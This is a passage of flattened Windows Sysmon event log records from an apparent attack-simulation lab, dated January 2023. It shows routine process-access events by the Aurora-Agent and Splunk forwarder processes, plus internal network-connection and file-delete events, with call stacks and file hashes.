Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000016916Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.758{E5A8D418-E4C3-63C7-0D02-00000000B002}29843240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016915Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.602{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E4C3-63C7-0D02-00000000B002}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016914Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.602{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016913Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.602{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016912Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.602{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016911Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.602{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016910Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.602{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016909Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.602{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016908Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.602{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016907Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.602{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016906Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.602{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016905Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.602{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E4C3-63C7-0D02-00000000B002}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016904Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.602{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E4C3-63C7-0D02-00000000B002}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016903Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.603{E5A8D418-E4C3-63C7-0D02-00000000B002}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000016902Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.027{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50114-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016901Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.372{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DC52AE3C860F728F709D9B984EF66B9,SHA256=127290CEC9CD231338A9FCA71071E00AF438A6909AB64E0BEB1872BF63E3EC00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016900Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:31.213{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=359ACACC1705F9DE3C329811B9D10754,SHA256=6E0DA07B459D59907419CE47DF941BAC351D8145FDD06303A81AAA6805FE1EE4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.832{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.820{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.797{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.791{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.751{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.742{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program 